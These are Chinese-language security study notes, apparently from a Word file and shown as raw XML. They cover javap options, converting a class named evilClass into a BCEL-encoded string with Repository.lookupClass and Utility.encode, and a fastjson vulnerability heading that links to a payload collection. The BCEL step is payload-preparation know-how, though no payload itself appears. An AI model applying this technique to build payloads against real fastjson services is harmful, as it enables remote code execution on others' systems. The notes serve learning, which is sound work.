      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些常用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选项包括：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7A1601" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    -c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：显示字节码指令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AB11D6" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    -s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：显示类文件中的所有字段的签名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D800C2" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    -l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：显示行号和局部变量表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A1C6ED" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    -verbose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：显示更详细的输出信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605951A2" w14:textId="77777777" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190CFBEF" w14:textId="3A752C0F" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，要查看名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MyClass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的类的字节码指令，可以在命令行中运行：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3472F6D9" w14:textId="3C281F7B" w:rsidR="004C50F5" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>javap -c MyClass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEC0C34" w14:textId="3974BBE3" w:rsidR="00B52D72" w:rsidRDefault="004C50F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令对于理解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节码和调试代码非常有用，但它主要适用于开发和调试目的，一般不用于常规应用程序的运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC5CD16" w14:textId="77777777" w:rsidR="00B52D72" w:rsidRDefault="00B52D72" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B90BD52" w14:textId="4E4F1FD2" w:rsidR="00FD33ED" w:rsidRDefault="00D941AE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>打印已加载类的字节码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9342D2" w14:textId="2D715AA9" w:rsidR="00D941AE" w:rsidRDefault="0045509C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>evil</w:t>
      </w:r>
      <w:r>
        <w:t>Class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个同包下的其他类，此处使用</w:t>
      </w:r>
      <w:r>
        <w:t>evilClass.class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把其类对象找出来，然后可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>ls.getBytes()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将字节码打印出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EF4B6E" w14:textId="634EE139" w:rsidR="00AB07C7" w:rsidRDefault="00AB07C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以明白的一个结论：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB07C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>所有类都是字节码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC593C4" w14:textId="77777777" w:rsidR="00AB07C7" w:rsidRDefault="00AB07C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A7362DA" w14:textId="77777777" w:rsidR="0045509C" w:rsidRDefault="0045509C" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="292A2F"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">public static void </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="41A1C0"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">[] argv) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">throws </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaClass </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">cls = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Repository</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lookupClass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>evilClass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Arrays</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>toString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(cls.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>getBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>()));</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">String </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">code = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Utility</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>encode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(cls.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>getBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">(), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FC5FA3"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>转换为字节码并编码为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bcel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="6C7986"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5DD8FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A167E6"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="67B7A4"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(code);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F33982F" w14:textId="77777777" w:rsidR="00D941AE" w:rsidRPr="0045509C" w:rsidRDefault="00D941AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D2CB81" w14:textId="77777777" w:rsidR="00D941AE" w:rsidRDefault="00D941AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D5EF80" w14:textId="77777777" w:rsidR="00D941AE" w:rsidRPr="00D941AE" w:rsidRDefault="00D941AE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F8F6637" w14:textId="77777777" w:rsidR="00FD33ED" w:rsidRDefault="00FD33ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62F6BD07" w14:textId="77777777" w:rsidR="00FD33ED" w:rsidRPr="00FD33ED" w:rsidRDefault="00FD33ED" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B7846A" w14:textId="77777777" w:rsidR="000B7EA6" w:rsidRDefault="000B7EA6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CEE9BC2" w14:textId="77777777" w:rsidR="000B7EA6" w:rsidRDefault="000B7EA6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fastjson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D288DA" w14:textId="77777777" w:rsidR="00B90793" w:rsidRDefault="00B90793" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2EDF46" w14:textId="6EAE8F7D" w:rsidR="000B7EA6" w:rsidRDefault="000B7EA6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大全，看了后这个连接值得记住。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9DF144" w14:textId="238D6FD7" w:rsidR="000B7EA6" w:rsidRDefault="005B1877" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="000A26E2">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://www.ctfiot.com/20548.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B983A34" w14:textId="77777777" w:rsidR="005B1877" w:rsidRDefault="005B1877" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C785894" w14:textId="77777777" w:rsidR="00B90793" w:rsidRDefault="00B90793" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
